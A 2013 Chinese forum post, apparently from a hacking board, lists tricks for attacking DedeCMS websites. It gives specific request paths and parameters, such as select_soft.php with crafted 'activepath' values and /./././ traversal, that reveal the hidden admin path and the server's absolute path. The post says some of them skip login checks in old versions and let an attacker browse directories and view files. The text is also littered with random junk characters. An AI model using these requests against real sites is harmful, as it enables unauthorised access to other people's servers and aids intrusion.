找回密码
 立即注册
查看: 2856|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理  W- E9 \, ^  x9 q. c2 E, d
3 x. [  i. C7 E. e, _1 F: ~! _
员帐号,新版本的就直接转向了后台.
( S# ]) Y* p# V, u
' m0 R! T: U. T7 f/ l2.include/dialog/config.php会爆出后台管理路径
% Z5 o0 n* f2 I4 s; a8 [* ?# G: |. g6 C) R2 m2 F4 z1 ?
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
. g# `3 a3 v8 m2 a3 b. F
. k8 F7 C6 Y3 M: u4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.6 `8 h/ z- R$ _
. L, K: r7 Z' u) H& c
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉* W8 u7 G, z% s+ B6 v( E

2 |: e7 q7 U9 x( \2 E到根目录去.不过这些版本的访问地址有些不同.  E' s1 O( g$ t+ z+ N6 [
地址为require/dialog/select_soft.php?activepath=/././././././././
* |4 \. M/ c$ C( K( G# M8 s9 c5 c& h
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..* q3 L4 m' ?4 t
存在相同问题的文件还有
9 y, O, g" W, s. ^include\dialog\select_images.php
  \. R* B9 `. ^) b. [5 minclude\dialog\select_media.php
; O' p# W. G$ d$ I. V4 G. Dinclude\dialog\select_templets.php​# J, E; h7 e, D! x! h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表